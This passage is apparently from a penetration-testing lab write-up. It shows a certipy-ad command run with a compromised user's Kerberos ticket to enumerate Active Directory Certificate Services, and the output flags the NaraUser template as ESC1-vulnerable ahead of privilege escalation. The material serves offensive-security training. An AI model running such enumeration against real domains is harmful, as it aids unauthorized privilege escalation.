ADCS
ADCS is running on the nara.nara-security.com(192.168.209.30) host and it was confirmed upon the initial foothold.
Attempting to enumerate ADCS of the target system, using TGT of the compromised tracy.white user.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=tracy.white@nara.nara-security.com.ccache certipy-ad find -vulnerable -target nara -k -no-pass -dns-tcp -ns $IP -dc-ip $IP -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'NARA-CA' via RRP
[!] Failed to get CA configuration for 'NARA-CA' via RRP:
[!] Use -debug to print a stacktrace
[!] Could not retrieve configuration for 'NARA-CA'
[*] Checking web enrollment for CA 'NARA-CA' @ 'Nara.nara-security.com'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : NARA-CA
DNS Name : Nara.nara-security.com
Certificate Subject : CN=NARA-CA, DC=nara-security, DC=com
Certificate Serial Number : 2401E520F70B7DA34C32FABC71D89E1D
Certificate Validity Start : 2023-07-30 14:06:05+00:00
Certificate Validity End : 2123-07-30 14:16:04+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Unknown
Request Disposition : Unknown
Enforce Encryption for Requests : Unknown
Active Policy : Unknown
Disabled Extensions : Unknown
Certificate Templates
0
Template Name : NaraUser
Display Name : NaraUser
Certificate Authorities : NARA-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : UserInteractionRequired
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 100 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2023-07-30T14:48:10+00:00
Template Last Modified : 2023-07-30T14:49:11+00:00
Permissions
Enrollment Permissions
Enrollment Rights : NARA-SECURITY.COM\Domain Admins
NARA-SECURITY.COM\Domain Users
NARA-SECURITY.COM\Enterprise Admins
Object Control Permissions
Owner : NARA-SECURITY.COM\Administrator
Full Control Principals : NARA-SECURITY.COM\Domain Admins
NARA-SECURITY.COM\Enterprise Admins
NARA-SECURITY.COM\Enrollment
Write Owner Principals : NARA-SECURITY.COM\Domain Admins
NARA-SECURITY.COM\Enterprise Admins
NARA-SECURITY.COM\Enrollment
Write Dacl Principals : NARA-SECURITY.COM\Domain Admins
NARA-SECURITY.COM\Enterprise Admins
NARA-SECURITY.COM\Enrollment
Write Property Enroll : NARA-SECURITY.COM\Domain Admins
NARA-SECURITY.COM\Domain Users
NARA-SECURITY.COM\Enterprise Admins
[+] User Enrollable Principals : NARA-SECURITY.COM\Domain Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.A vulnerable(ESC1) certificate template identified; NaraUser
Moving onto the Privilege Escalation phase.